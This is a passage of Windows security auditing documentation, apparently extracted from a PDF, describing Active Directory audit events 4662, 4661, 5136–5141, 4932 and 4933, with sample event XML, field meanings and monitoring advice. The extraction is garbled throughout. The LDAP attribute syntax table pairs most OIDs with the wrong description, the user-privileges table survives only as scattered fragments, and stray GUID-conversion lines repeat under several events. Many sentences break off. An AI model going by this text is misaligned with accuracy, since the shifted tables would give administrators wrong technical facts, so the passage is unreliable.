on domain
controllers.
STRONGER STRONGER

makes sense only
on domain
controllers.
Events List:
4662(S, F ): An operation was performed on an object.
4661(S, F ): A handle to an object was requested.
4662(S, F): An operation was performed on an
object.
Applies to
Windows 10
Windows Server 2016
Subcategory: Audit Directory Service
Access
Event Description:
This event generates every time when
an operation was performed on an
Active Directory object.
This event generates only if appropriate
SACL was set for Active Directory
object and performed operation meets
this SACL.
If operation failed then Failure event
will be generated.
You will get one 4662 for each
operation type which was performed.

Security Monitoring
Event XML:
- <System>
<Level>0</Level>
<Task>14080</Task>
<Opcode>0</Opcode>
<Correlation />
<Security />
</System>
- <EventData>
<Data Name="ObjectServer">DS</Data>
<Data Name="ObjectType">%{bf967a86-0de6-11d0-a285-00aa003049e2}</Data>
<Data Name="ObjectName">%{38b3d2e6-9948-4dc1-ae90-1605d5eab9a2}</Data>
<Data Name="OperationType">Object Access</Data>
<Data Name="HandleId">0x0</Data>
<Data Name="AccessList">%%1537</Data>
<Data Name="AccessMask">0x10000</Data>
<Data Name="Properties">%%1537 {bf967a86-0de6-11d0-a285-00aa003049e2}</Data>
<Data Name="AdditionalInfo">-</Data>
<Data Name="AdditionalInfo2" />
</EventData>
</Event>

Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID ]: SID of account that requested the operation. Event Viewer automatically tries to
event.
Account Name [Type = UnicodeString]: the name of the account that requested the operation.
the following:
Object:
Object Server [Type = UnicodeString]: has “DS” value for this event.
Object Type [Type = UnicodeString]: type or class of the object that was accessed. Some of the common
Active Directory object types and classes are:
container – for containers.
user – for users.
group – for groups.
domainDNS – for domain object.
groupPolicyContainer – for group policy objects.
For all possible values of Object Type open Active Directory Schema snap-in (see how to enable
this snap-in: https://technet.microsoft.com/library/Cc755885(v=WS.10).aspx) and navigate to Active
Directory Schema\Classes. Or use this document:
https://msdn.microsoft.com/library/cc221630.aspx
Object Name [Type = UnicodeString]: distinguished name of the object that was accessed.
attributes:
• CN - commonName
Handle ID [Type = Pointer]: hexadecimal value of a handle to Object Name. This field can help you correlate
this event with other events that might contain the same Handle ID, for example, “4661: A handle to an object
was requested.” This parameter might not be captured in the event, and in that case appears as “0x0”.
Operation:
Operation Type [Type = UnicodeString]: the type of operation which was performed on an object.
Typically has “Object Access” value for this event.
Accesses [Type = UnicodeString]: the type of access used for the operation. See “Table 9. Active Directory
Access Codes and Rights.” for more information.
Access Mask [Type = HexInt32]: hexadecimal mask for the type of access used for the operation. See
“Table 9. Active Directory Access Codes and Rights.” for more information.
ACCESS MASK ACCESS NAME DESCRIPTION
0x1 Create Child The right to create child objects of the

object.
0x2 Delete Child The right to delete child objects of the

object.
0x4 List Contents The right to list child objects of this

object.
0x8 SELF The right to perform an operation

controlled by a validated write access
right.
0x10 Read Property The right to read properties of the

object.
0x20 Write Property The right to write properties of the

object.
0x40 Delete Tree Delete all children of this object,

regardless of the permissions of the
children. It is indicates that “Use Delete
Subtree server control” check box was
checked during deletion. This operation
means that all objects within the
subtree, including all delete-protected
objects, will be deleted.
0x80 List Object The right to list a particular object.
0x100 Control Access Access allowed only after extended

rights checks supported by the object
are performed.
The right to perform an operation
controlled by an extended access right.
0x10000 DELETE The right to delete the object.

DELETE also generated when object was
moved.
0x20000 READ_CONTROL The right to read data from the security

descriptor of the object, not including
the data in the SACL.
0x40000 WRITE_DAC The right to modify the discretionary

access-control list (DACL) in the object
security descriptor.
ACCESS MASK ACCESS NAME DESCRIPTION
0x80000 WRITE_OWNER The right to assume ownership of the

object. The user must be an object
trustee. The user cannot transfer the
ownership to other users.
0x100000 SYNCHRONIZE The right to use the object for

synchronization. This enables a thread
to wait until the object is in the signaled
state.
0x1000000 ADS_RIGHT_ACCESS_SYSTEM_SECURIT The right to get or set the SACL in the

Y object security descriptor.
0x80000000 ADS_RIGHT_GENERIC_READ The right to read permissions on this

object, read all the properties on this
object, list this object name when the
parent container is listed, and list the
contents of this object if it is a container.
0x40000000 ADS_RIGHT_GENERIC_WRITE The right to read permissions on this

object, write all the properties on this
object, and perform all validated writes
to this object.
0x20000000 ADS_RIGHT_GENERIC_EXECUTE The right to read permissions on, and

list the contents of, a container object.
0x10000000 ADS_RIGHT_GENERIC_ALL The right to create or delete child

objects, delete a subtree, read and write
properties, examine child objects and
the object itself, add and remove the
object from the directory, and read or
write with an extended right.
Table 9. Active Directory Access Codes and Rights.
Properties [Type = UnicodeString]: first part is the type of access that was used. Typically has the same
value as Accesses field.
Second part is a tree of GUID values of Active Directory classes or property sets, for which operation was
performed.
To translate this GUID, use the following procedure:

Perform the following LDAP search using LDP.exe tool:
Base DN: CN=Schema,CN=Configuration,DC=XXX,DC=XXX
Filter: (&(objectClass=*)(schemaIDGUID=GUID ))
Perform the following operations with the GUID before using it in a search request:
We have this GUID to search for: bf967a86-0de6-11d0-a285-00aa003049e2
Take first 3 sections bf967a86-0de6-11d0.
For each of these 3 sections you need to change (Invert) the order of bytes, like this
867a96bf-e60d-d011
Add the last 2 sections without transformation: 867a96bf-e60d-d011-a285-
00aa003049e2
Delete - : 867a96bfe60dd011a28500aa003049e2
Divide bytes with backslashes: \86\7a\96\bf\e6\0d\d0\11\a2\85\00\aa\00\30\49\e2
Filter example: (&(objectClass=*)
(schemaIDGUID=\86\7a\96\bf\e6\0d\d0\11\a2\85\00\aa\00\30\49\e2))
Scope: Subtree
Attributes: schemaIDGUID
Sometimes GUID refers to pre-defined Active Directory Property Sets, you can find GUID (Rights-GUID field),
“property set name” and details here: https://msdn.microsoft.com/library/ms683990(v=vs.85).aspx.
Here is an example of decoding of Properties field:
PROPERTIES TRANSLATION
{bf967a86-0de6-11d0-a285-00aa003049e2} Computer
{91e647de-d96f-4b70-9557-d63ff4f3ccd8} Private-Information property set
{6617e4ac-a2f1-43ab-b60c-11fbd1facf05} ms-PKI-RoamingTimeStamp
{b3f93023-9239-4f7c-b99c-6745d87adbc2} ms-PKI-DPAPIMasterKeys
{b8dfa744-31dc-4ef1-ac7c-84baf7ef9da7} ms-PKI-AccountCredentials
Parameter 1 [Type = UnicodeString]: there is no information about this field in this document.
Parameter 2 [Type = UnicodeString]: there is no information about this field in this document.

For 4662(S, F ): An operation was performed on an object.
If you need to monitor operations attempts to specific Active Directory classes, monitor for Object Type
field with specific class name. For example, we recommend that you monitor all operations attempts to
domainDNS class.
If you need to monitor operations attempts to specific Active Directory objects, monitor for Object Name
field with specific object name. For example, we recommend that you monitor all operations attempts to
“CN=AdminSDHolder,CN=System,DC=domain,DC=com” object.
Some access types are more important to monitor, for example:
Write Property
Control Access
DELETE
WRITE_DAC
WRITE_OWNER
You can decide to monitor these (or one of these) access types for specific Active Directory objects.
To do so, monitor for Accesses field with specific access type.
If you need to monitor operations attempts to specific Active Directory properties, monitor for Properties
field with specific property GUID.
Do not forget that Failure attempts are also very important to audit. Decide where you want to monitor
Failure attempts based on previous recommendations.
4661(S, F): A handle to an object was requested.
Applies to
Windows 10
Windows Server 2016
Subcategories: Audit Directory Service Access
and Audit SAM
Event Description:
This event indicates that a handle was
requested for either an Active Directory object
or a Security Account Manager (SAM ) object.
If access was declined, then Failure event is
generated.
This event generates only if Success auditing is
enabled for the Audit Handle Manipulation
subcategory.

Event XML:
- <System>
<Level>0</Level>
<Task>14080</Task>
<Opcode>0</Opcode>
<Correlation />
<Security />
</System>
- <EventData>
<Data Name="ObjectServer">Security Account Manager</Data>
<Data Name="ObjectType">SAM\_DOMAIN</Data>
<Data Name="ObjectName">DC=contoso,DC=local</Data>
<Data Name="HandleId">0xdd64d36870</Data>
<Data Name="TransactionId">{00000000-0000-0000-0000-000000000000}</Data>
<Data Name="AccessMask">0x2d</Data>
<Data Name="PrivilegeList">Ā</Data>
<Data Name="Properties">-</Data>
<Data Name="RestrictedSidCount">2949165</Data>
<Data Name="ProcessId">0x9000a000d002d</Data>
<Data Name="ProcessName">{bf967a90-0de6-11d0-a285-00aa003049e2} %%5400 {ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501}
</Data>
</EventData>
</Event>
Required Server Roles: For an Active Directory object, the domain controller role is required. For a SAM object,
there is no required role.
Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID ]: SID of account that requested a handle to an object. Event Viewer automatically tries
event.
identify the user in all subsequent interactions with Windows security. When a SID has been used as the unique
identifier for a user or group, it cannot ever be used again to identify another user or group. For more
Account Name [Type = UnicodeString]: the name of the account that requested a handle to an object.
the following:
Object:
Object Server [Type = UnicodeString]: has “Security Account Manager” value for this event.
Object Type [Type = UnicodeString]: the type or class of the object that was accessed. The following list
contains possible values for this field:
SAM_ALIAS - a local group.
SAM_GROUP - a group that is not a local group.
SAM_USER - a user account.
SAM_DOMAIN - a domain. For Active Directory events, this is the typical value.
SAM_SERVER - a computer account.
Object Name [Type = UnicodeString]: the name of an object for which access was requested. Depends on
Object Type. This event can have the following format:
SAM_ALIAS – SID of the group.
SAM_GROUP - SID of the group.
SAM_USER - SID of the account.
SAM_DOMAIN – distinguished name of the accessed object.
SAM_SERVER - distinguished name of the accessed object.
attributes:
• CN - commonName
this event with other events that might contain the same Handle ID, for example, “4662: An operation was
performed on an object.” This parameter might not be captured in the event, and in that case appears as “0x0”.
Process ID [Type = Pointer]: hexadecimal Process ID of the process that requested the handle. Process ID
(PID ) is a number used by the operating system to uniquely identify an active process. To see the PID for a
Access Request Information:
Transaction ID [Type = GUID ]: unique GUID of the transaction. This field can help you correlate this event
with other events that might contain the same the Transaction ID, such as “4660(S ): An object was deleted.”
0000-000000000000}”.
Accesses [Type = UnicodeString]: the list of access rights which were requested by Subject\Security ID.
These access rights depend on Object Type. See “Table 13. File access codes.” for more information about
file access rights. For information about SAM object access right use https://technet.microsoft.com/ or other
informational resources.
Access Mask [Type = HexInt32]: hexadecimal mask for the operation that was requested or performed. See
“Table 13. File access codes.” for more information about file access rights. For information about SAM
object access right use https://technet.microsoft.com/ or other informational resources.
Privileges Used for Access Check [Type = UnicodeString]: the list of user privileges which were used
during the operation, for example, SeBackupPrivilege. This parameter might not be captured in the event,
and in that case appears as “-”. See full list of user privileges in the table below:


a process.

operations.
held:
READ_CONTROL
FILE_GENERIC_READ
FILE_TRAVERSE




SeCreateTokenPrivilege Create a token object Allows a process to create a token which

it can then use to get access to any local
resources when the process uses
NtCreateToken() or other token-creation
APIs.

account.
components.

a process.
interface.
to a process.
users.
driver.

memory.
computer account.
controllers.

defragmentation.

monitor the performance of non-system
processes.

network request.

to set any valid user or group SID as the
owner of a file. The following access
held:
WRITE_DAC
WRITE_OWNER
FILE_GENERIC_WRITE
FILE_ADD_FILE
DELETE
an object.

security event log.
synchronization.
information.

processes.
of the computer. Users that are assigned
this user right can affect the appearance
of event logs. If the system time is
changed, events that are logged will
reflect this new time, not the actual time
that the events occurred.
clock.



a terminal device.
Properties [Type = UnicodeString]: depends on Object Type. This field can be empty or contain the list of
the object properties that were accessed. See more detailed information in “4661: A handle to an object was
requested” from Audit SAM subcategory.
Restricted SID Count [Type = UInt32]: Number of restricted SIDs in the token. Applicable to only specific
Object Types.
For 4661(S, F ): A handle to an object was requested.
You can get almost the same information from “4662: An operation was performed on an object.” There are no
additional recommendations for this event in this document.
Applies to
Windows 10
Windows Server 2016
Audit Directory Service Changes determines whether the operating system generates audit events when changes
are made to objects in Active Directory Domain Services (AD DS ).
Auditing of directory service objects can provide information about the old and new properties of the objects that
were changed.
Audit events are generated only for objects with configured system access control lists (SACLs), and only when
they are accessed in a manner that matches their SACL settings. Some objects and properties do not cause audit
events to be generated due to settings on the object class in the schema.
This subcategory only logs events on domain controllers.
Event volume: High on domain controllers.
This subcategory triggers events when an Active Directory object was modified, created, undeleted, moved, or
deleted.
STRONGER STRONGER
STRONGER STRONGER
Domain Yes No Yes No It is important to

Controller track actions
related to high
value or critical
Active Directory
objects, for
example, changes
to
AdminSDHolder
container or
Domain Admins
group objects.
This subcategory
shows you what
actions were
performed. If you
want to track
failed access
attempts for
Active Directory
objects you need
to take a look at
Audit Directory
Service Access
subcategory.
For
recommendation
s for using and
analyzing the
collected
information, see
the Security
Monitoring
Recommendatio
ns sections. Also,
develop an
Active Directory
auditing policy
(SACL design for
specific classes,
operation types
which need to be
monitored for
specific
Organizational
Units, and so on)
so you can audit
only the access
attempts that are
made to specific
important
objects.
This subcategory
doesn’t have
Failure events, so
there is no
recommendation
to enable Failure
auditing for this
subcategory.
STRONGER STRONGER

makes sense only
on domain
controllers.

makes sense only
on domain
controllers.
Events List:
5136(S ): A directory service object was modified.
5137(S ): A directory service object was created.
5138(S ): A directory service object was undeleted.
5139(S ): A directory service object was moved.
5141(S ): A directory service object was deleted.
5136(S): A directory service object was modified.
Applies to
Windows 10
Windows Server 2016
Changes
Event Description:
This event generates every time an Active
Directory object is modified.
To generate this event, the modified object
must have an appropriate entry in SACL: the
“Write” action auditing for specific attributes.
For a change operation you will typically see
two 5136 events for one action, with different
Operation\Type fields: “Value Deleted” and
then “Value Added”. “Value Deleted” event
typically contains previous value and “Value
Added” event contains new value.

Event XML:
- <System>
<Level>0</Level>
<Task>14081</Task>
<Opcode>0</Opcode>
<Correlation />
<Security />
</System>
- <EventData>
<Data Name="OpCorrelationID">{02647639-8626-43CE-AFE6-7AA1AD657739}</Data>
<Data Name="AppCorrelationID">-</Data>
<Data Name="DSName">contoso.local</Data>
<Data Name="DSType">%%14676</Data>
<Data Name="ObjectDN">CN=Sergey,CN=Builtin,DC=contoso,DC=local</Data>
<Data Name="ObjectGUID">{4FE80A66-5F93-4F73-B215-68678058E613}</Data>
<Data Name="ObjectClass">user</Data>
<Data Name="AttributeLDAPDisplayName">userAccountControl</Data>
<Data Name="AttributeSyntaxOID">2.5.5.9</Data>
<Data Name="AttributeValue">512</Data>
<Data Name="OperationType">%%14675</Data>
</EventData>
</Event>

Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID ]: SID of account that requested the “modify object” operation. Event Viewer
Account Name [Type = UnicodeString]: the name of the account that requested the “modify object”
operation.
the following:
Directory Service:
Name [Type = UnicodeString]: the name of the Active Directory domain where the modified object is
located.
Type [Type = UnicodeString]: has “Active Directory Domain Services” value for this event.
Object:
DN [Type = UnicodeString]: distinguished name of the object that was modified.
attributes:
• CN - commonName
GUID [Type = GUID ]: each Active Directory object has globally unique identifier (GUID ), which is a 128-bit
value that is unique not only in the enterprise but also across the world. GUIDs are assigned to every object
created by Active Directory. Each object's GUID is stored in its Object-GUID (objectGUID ) property.
Active Directory uses GUIDs internally to identify objects. For example, the GUID is one of an object's
properties that is published in the global catalog. Searching the global catalog for a User object's GUID will
yield results if the user has an account somewhere in the enterprise. In fact, searching for any object by
Object-GUID might be the most reliable way of finding the object you want to find. The values of other
object properties can change, but the Object-GUID never changes. When an object is assigned a GUID, it
keeps that value for life.
Event Viewer automatically resolves GUID field to real object.
Filter: (&(objectClass=*)(objectGUID=GUID ))
We have this GUID to search for: a6b34ab5-551b-4626-b8ee-2b36b3ee6672
Take first 3 sections a6b34ab5-551b-4626.
For each of these 3 sections you need to change (Invert) the order of bytes, like
this b54ab3a6-1b55-2646
Add the last 2 sections without transformation: b54ab3a6-1b55-2646-b8ee-
2b36b3ee6672
Delete - : b54ab3a61b552646b8ee2b36b3ee6672
Divide bytes with backslashes:
\b5\4a\b3\a6\1b\55\26\46\b8\ee\2b\36\b3\ee\66\72
Filter example: (&(objectClass=*)(objectGUID =
\b5\4a\b3\a6\1b\55\26\46\b8\ee\2b\36\b3\ee\66\72))
Scope: Subtree
Attributes: objectGUID
Class [Type = UnicodeString]: class of the object that was modified. Some of the common Active Directory
object classes:
user – for users.
For all possible values of this field open Active Directory Schema snap-in (see how to enable this
snap-in: https://technet.microsoft.com/library/Cc755885(v=WS.10).aspx) and navigate to Active
Attribute:
LDAP Display Name [Type = UnicodeString]: the object attribute that was modified.
Note LDAP Display Name is the name used by LDAP clients, such as the ADSI LDAP provider, to read and
write the attribute by using the LDAP protocol.
Syntax (OID ) [Type = UnicodeString]: The syntax for an attribute defines the storage representation, byte
ordering, and matching rules for comparisons of property types. Whether the attribute value must be a string, a
number, or a unit of time is also defined. Every attribute of every object is associated with exactly one syntax.
The syntaxes are not represented as objects in the schema, but they are programmed to be understood by
Active Directory. The allowable syntaxes in Active Directory are predefined.
OID SYNTAX NAME DESCRIPTION
2.5.5.0 Undefined Not a legal syntax.

OID SYNTAX NAME DESCRIPTION
2.5.5.1 Object(DN-DN) The fully qualified name of an object in

the directory.
2.5.5.2 String(Object-Identifier) The object identifier.
2.5.5.3 Case-Sensitive String General String.
2.5.5.4 CaseIgnoreString(Teletex) Differentiates uppercase and lowercase.
2.5.5.5 String(Printable), String(IA5) Teletex. Does not differentiate

uppercase and lowercase.
2.5.5.6 String(Numeric) Printable string or IA5-String.
2.5.5.7 Object(DN-Binary) Both character sets are case-sensitive.
2.5.5.8 Boolean A sequence of digits.
2.5.5.9 Integer, Enumeration A distinguished name plus a binary

large object.
2.5.5.10 String(Octet) TRUE or FALSE values.
2.5.5.11 String(UTC-Time), String(Generalized- A 32-bit number or enumeration.

Time)
2.5.5.12 String(Unicode) A string of bytes.
2.5.5.13 Object(Presentation-Address) UTC Time or Generalized-Time.
2.5.5.14 Object(DN-String) Unicode string.
2.5.5.15 String(NT-Sec-Desc) Presentation address.
2.5.5.16 LargeInteger A DN-String plus a Unicode string.
2.5.5.17 String(Sid) A Microsoft® Windows NT® Security

descriptor.
Table 10. LDAP Attribute Syntax OIDs.
Value [Type = UnicodeString]: the value which was added or deleted, depending on the Operation\Type field.
Operation:
Type [Type = UnicodeString]: type of performed operation.
Value Added – new value added.
Value Deleted – value deleted (typically “Value Deleted” is a part of change operation).
Correlation ID [Type = GUID ]: multiple modifications are often executed as one operation via LDAP. This
value allows you to correlate all the modification events that comprise the operation. Just look for other events
from current subcategory with the same Correlation ID, for example “5137: A directory service object was
created.” and “5139: A directory service object was moved.”
Application Correlation ID [Type = UnicodeString]: always has “-“ value. Not in use.

For 5136(S ): A directory service object was modified.
If you need to monitor modifications to specific Active Directory objects, monitor for DN field with specific
object name. For example, we recommend that you monitor all modifications to
“CN=AdminSDHolder,CN=System,DC=domain,DC=com” object.
If you need to monitor modifications to specific Active Directory classes, monitor for Class field with specific
class name. For example, we recommend that you monitor all modifications to domainDNS class.
If you need to monitor modifications to specific Active Directory attributes, monitor for LDAP Display
Name field with specific attribute name.
It is better to monitor Operation\Type = Value Added events, because you will see the new value of
attribute. At the same time you can correlate to previous Operation\Type = Value Deleted event with the
same Correlation ID to see the previous value.
5137(S): A directory service object was created.
Applies to
Windows 10
Windows Server 2016
Changes
Event Description:
Directory object is created.
This event only generates if the parent object
has a particular entry in its SACL: the
“Create” action, auditing for specific classes or
objects. An example is the “Create Computer
objects” action auditing for the organizational
unit.

event.
Event XML:
- <System>
<Level>0</Level>
<Task>14081</Task>
<Opcode>0</Opcode>
<Correlation />
<Security />
</System>
- <EventData>
<Data Name="OpCorrelationID">{4EAD68FF-7229-42A4-8C73-AAB57169858B}</Data>
<Data Name="ObjectDN">cn=Win2000,CN=Users,DC=contoso,DC=local</Data>
<Data Name="ObjectGUID">{41D5F7AF-64A2-4985-9A4B-70DAAFC7CCE6}</Data>
<Data Name="ObjectClass">computer</Data>
</EventData>
</Event>

Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID ]: SID of account that requested the “create object” operation. Event Viewer
Account Name [Type = UnicodeString]: the name of the account that requested the “create object”
operation.
the following:
Directory Service:
Name [Type = UnicodeString]: the name of an Active Directory domain, where new object is created.
Object:
DN [Type = UnicodeString]: distinguished name of the object that was created.
attributes:
• CN - commonName
this b54ab3a6-1b55-2646
2b36b3ee6672
\b5\4a\b3\a6\1b\55\26\46\b8\ee\2b\36\b3\ee\66\72
\b5\4a\b3\a6\1b\55\26\46\b8\ee\2b\36\b3\ee\66\72))
Scope: Subtree
Class [Type = UnicodeString]: class of the object that was created. Some of the common Active Directory
object classes:
user – for users.
Operation:
modified.” and “5139: A directory service object was moved.”

For 5137(S ): A directory service object was created.
If you need to monitor creation of Active Directory objects with specific classes, monitor for Class field with
specific class name. For example, we recommend that you monitor all new group policy objects creations:
groupPolicyContainer class.
You must set correct auditing access lists (SACLs) for specific classes within Active Directory container to
get 5137. There is no reason to audit all creation events for all types of Active Directory objects; find the
most important locations (organizational units, folders, etc.) and monitor for creation of specific classes only
(user, computer, group, etc.).
5138(S): A directory service object was undeleted.
Applies to
Windows 10
Windows Server 2016
Subcategory: Audit Directory Service Changes

Event Description:
This event generates every time an Active Directory object is undeleted. It happens, for example, when an Active
Directory object was restored from the Active Directory Recycle Bin.
This event only generates if the container to which the Active Directory object was restored has a particular entry
in its SACL: the “Create” action, auditing for specific classes or objects. An example is the “Create User objects”
action.
Event XML:
- <System>
<Level>0</Level>
<Task>14081</Task>
<Opcode>0</Opcode>
<Correlation />
<Security />
</System>
- <EventData>
<Data Name="OpCorrelationID">{3E2B5ECF-4C35-4C3F-8D82-B8D6F477D846}</Data>
<Data Name="SubjectLogonId">0x3be49</Data>
<Data Name="OldObjectDN">CN=Andrei\\0ADEL:53511188-bc98-4995-9d78-2d40143c9711,CN=Deleted
Objects,DC=contoso,DC=local</Data>
<Data Name="NewObjectDN">CN=Andrei,CN=Users,DC=contoso,DC=local</Data>
<Data Name="ObjectGUID">{53511188-BC98-4995-9D78-2D40143C9711}</Data>
</EventData>
</Event>

Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID ]: SID of account that requested that the object be undeleted or restored. Event Viewer
Account Name [Type = UnicodeString]: name of account that requested that the object be undeleted or
restored.
the following:
Directory Service:
Name [Type = UnicodeString]: the name of an Active Directory domain, where the object was undeleted.
Object:
Old DN [Type = UnicodeString]: Old distinguished name of undeleted object. It will points to Active Directory
Recycle Bin folder, in case if it was restored from it.
attributes:
• CN - commonName
New DN [Type = UnicodeString]: New distinguished name of undeleted object. The Active Directory
container to which the object was restored.
this b54ab3a6-1b55-2646
2b36b3ee6672
\b5\4a\b3\a6\1b\55\26\46\b8\ee\2b\36\b3\ee\66\72
\b5\4a\b3\a6\1b\55\26\46\b8\ee\2b\36\b3\ee\66\72))
Scope: Subtree
Class [Type = UnicodeString]: class of the object that was undeleted. Some of the common Active Directory
object classes:
user – for users.
Operation:

For 5138(S ): A directory service object was undeleted.
If you need to monitor undelete operations (restoration) of Active Directory objects with specific classes,
monitor for Class field with specific class name.
It may be a good idea to monitor all undelete events, because the operation is not performed very often.
Confirm that there is a reason for the object to be undeleted.
5139(S): A directory service object was moved.
Applies to
Windows 10
Windows Server 2016
Changes
Event Description:
This event generates every time an
Active Directory object is moved.
This event only generates if the
destination object has a particular
entry in its SACL: the “Create” action,
auditing for specific classes or objects.
An example is the “Create Computer
objects” action, auditing for the
organizational unit.

Security Monitoring
Event XML:
- <System>
<Level>0</Level>
<Task>14081</Task>
<Opcode>0</Opcode>
<Correlation />
<Security />
</System>
- <EventData>
<Data Name="OpCorrelationID">{67A42C05-A70D-4348-AF19-E883CB1FCA9C}</Data>
<Data Name="OldObjectDN">CN=NewUser,CN=Builtin,DC=contoso,DC=local</Data>
<Data Name="NewObjectDN">CN=NewUser,CN=Users,DC=contoso,DC=local</Data>
<Data Name="ObjectGUID">{06713960-9CC3-4B5D-A594-35883A04F934}</Data>
</EventData>
</Event>

Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID ]: SID of account that requested the “move object” operation. Event Viewer
Account Name [Type = UnicodeString]: the name of the account that requested the “move object”
operation.
the following:
Directory Service:
Name [Type = UnicodeString]: the name of an Active Directory domain, where the object was moved.
Object:
Old DN [Type = UnicodeString]: Old distinguished name of moved object.
attributes:
• CN - commonName
New DN [Type = UnicodeString]: New distinguished name of moved object. The Active Directory
container to which the object was moved.
this b54ab3a6-1b55-2646
2b36b3ee6672
\b5\4a\b3\a6\1b\55\26\46\b8\ee\2b\36\b3\ee\66\72
\b5\4a\b3\a6\1b\55\26\46\b8\ee\2b\36\b3\ee\66\72))
Scope: Subtree
Class [Type = UnicodeString]: class of the object that was moved. Some of the common Active Directory
object classes:
user – for users.
Operation:
created.” and “5141: A directory service object was deleted.”

For 5139(S ): A directory service object was moved.
If you need to monitor movement of Active Directory objects with specific classes, monitor for Class field
with specific class name.
You must set correct auditing access lists (SACLs) for specific classes within Active Directory container to
get 5139. There is no reason to audit all movement events for all types of Active Directory objects, you
need to find the most important locations (organizational units, folders, etc.) and monitor for movement of
specific classes only to these locations (user, computer, group, etc.).
5141(S): A directory service object was deleted.
Applies to
Windows 10
Windows Server 2016
Changes
Event Description:
Directory object is deleted.
This event only generates if the deleted object
has a particular entry in its SACL: the
“Delete” action, auditing for specific objects.

Event XML:
- <System>
<Level>0</Level>
<Task>14081</Task>
<Opcode>0</Opcode>
<Correlation />
<Security />
</System>
- <EventData>
<Data Name="OpCorrelationID">{C8A9000C-C618-4EE9-87FF-F852C0564F18}</Data>
<Data Name="ObjectDN">CN=WIN2003,CN=Users,DC=contoso,DC=local</Data>
<Data Name="ObjectGUID">{CA15B875-AFB1-4E5A-86B2-96E61DE09110}</Data>
<Data Name="ObjectClass">computer</Data>
<Data Name="TreeDelete">%%14679</Data>
</EventData>
</Event>

Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID ]: SID of account that requested the “delete object” operation. Event Viewer
Account Name [Type = UnicodeString]: the name of the account that requested the “delete object”
operation.
the following:
Directory Service:
Name [Type = UnicodeString]: the name of an Active Directory domain, where the object was deleted.
Object:
DN [Type = UnicodeString]: distinguished name of the object that was deleted.
attributes:
• CN - commonName
Event Viewer automatically resolves GUID field to real object. For deleted objects GUID will be resolved to
new destination of object, for example: OU=My\0ADEL:cc94c0d7-dd53-4061-9791-
e53478dbbc3b,CN=Deleted Objects,DC=contoso,DC=local.
this b54ab3a6-1b55-2646
2b36b3ee6672
\b5\4a\b3\a6\1b\55\26\46\b8\ee\2b\36\b3\ee\66\72
\b5\4a\b3\a6\1b\55\26\46\b8\ee\2b\36\b3\ee\66\72))
Scope: Subtree
Class [Type = UnicodeString]: class of the object that was deleted. Some of the common Active Directory
object classes:
user – for users.
Operation:
Tree Delete [Type = UnicodeString]:
Yes – “Delete Subtree” operation was performed. It happens, for example, if “Use Delete Subtree
server control” check box was checked during delete operation using Active Directory Users and
Computers management console.
No – delete operation was performed without “Delete Subtree” server control.

For 5141(S ): A directory service object was deleted.
If you need to monitor deletion of Active Directory objects with specific classes, monitor for Class field with
specific class name. For example, we recommend that you monitor for group policy objects deletions:
groupPolicyContainer class.
If you need to monitor deletion of specific Active Directory objects, monitor for DN field with specific object
name. For example, if you have critical Active Directory objects which should not be deleted, monitor for
their deletion.
Applies to
Windows 10
Windows Server 2016
Audit Directory Service Replication determines whether the operating system generates audit events when
replication between two domain controllers begins and ends.
Event volume: Medium on domain controllers.
STRONGER STRONGER
Domain No No IF IF IF - Events in this

typically have an
informational
purpose and it is
difficult to detect
any malicious
activity using
mainly used for
Active Directory
replication
troubleshooting.

makes sense only
on domain
controllers.

makes sense only
on domain
controllers.
Events List:
4932(S ): Synchronization of a replica of an Active Directory naming context has begun.
4933(S, F ): Synchronization of a replica of an Active Directory naming context has ended.
4932(S): Synchronization of a replica of an Active
Directory naming context has begun.
Applies to
Windows 10
Windows Server 2016
Subcategory: Audit Directory Service Replication

Event Description:
This event generates every time synchronization of a replica of an Active Directory naming context has begun.
Event XML:
- <System>
<Level>0</Level>
<Task>14082</Task>
<Opcode>0</Opcode>
<Correlation />
<Security />
</System>
- <EventData>
<Data Name="SessionID">48</Data>
<Data Name="StartUSN">20869</Data>
</EventData>
</Event>

Event Versions: 0.
Field Descriptions:
attributes:
• CN - commonName


Session ID [Type = UInt32]: unique identifier of replication session. Using this field you can find “4932:
Synchronization of a replica of an Active Directory naming context has begun.” and “4933: Synchronization
of a replica of an Active Directory naming context has ended.” events for the same session.
Start USN [Type = UnicodeString]: Naming Context’s USN number before replication begins.
Note Active Directory replication does not depend on time to determine what changes need to be
propagated. It relies instead on the use of update sequence numbers (USNs) that are assigned by a counter
that is local to each domain controller. Because these USN counters are local, it is easy to ensure that they are
reliable and never "run backward" (that is, decrease in value). The trade-off is that it is meaningless to compare
a USN assigned on one domain controller to a USN assigned on a different domain controller. The replication
system is designed with this restriction in mind.

For 4932(S ): Synchronization of a replica of an Active Directory naming context has begun.
Monitor for Source Address field, because the source of replication (DRA) must be authorized for this
action. If you find any unauthorized DRA you should trigger an event.
4933(S, F): Synchronization of a replica of an Active
Directory naming context has ended.
Applies to
Windows 10
Windows Server 2016
Subcategory: Audit Directory Service Replication

Event Description:
This event generates every time synchronization of a replica of an Active Directory naming context has ended.
Failure event occurs when synchronization of a replica of an Active Directory naming context failed.
Event XML:
- <System>
<Level>0</Level>
<Task>14082</Task>
<Opcode>0</Opcode>
<Correlation />
<Security />
</System>
- <EventData>
<Data Name="SessionID">40</Data>
<Data Name="EndUSN">20869</Data>
</EventData>
</Event>

Event Versions: 0.
Field Descriptions:
Directory Replication Agent uses the connection objects in the topology map to find out those partners that
are relevant when replicating changes to directory partitions. The DRA sends a replication request to the
partners of a domain controller when the domain controller needs to update its copy of Active Directory.
attributes:
• CN - commonName


Session ID [Type = UInt32]: unique identifier of replication session. Using this field you can find “4932:
Synchronization of a replica of an Active Directory naming context has begun.” and “4933: Synchronization
of a replica of an Active Directory naming context has ended.” events for the same session.
End USN [Type = UInt32]: Naming Context’s USN number after replication ends.
Note Active Directory replication does not depend on time to determine what changes need to be
propagated. It relies instead on the use of update sequence numbers (USNs) that are assigned by a counter
that is local to each domain controller. Because these USN counters are local, it is easy to ensure that they are
reliable and never "run backward" (that is, decrease in value). The trade-off is that it is meaningless to compare
a USN assigned on one domain controller to a USN assigned on a different domain controller. The replication
system is designed with this restriction in mind.
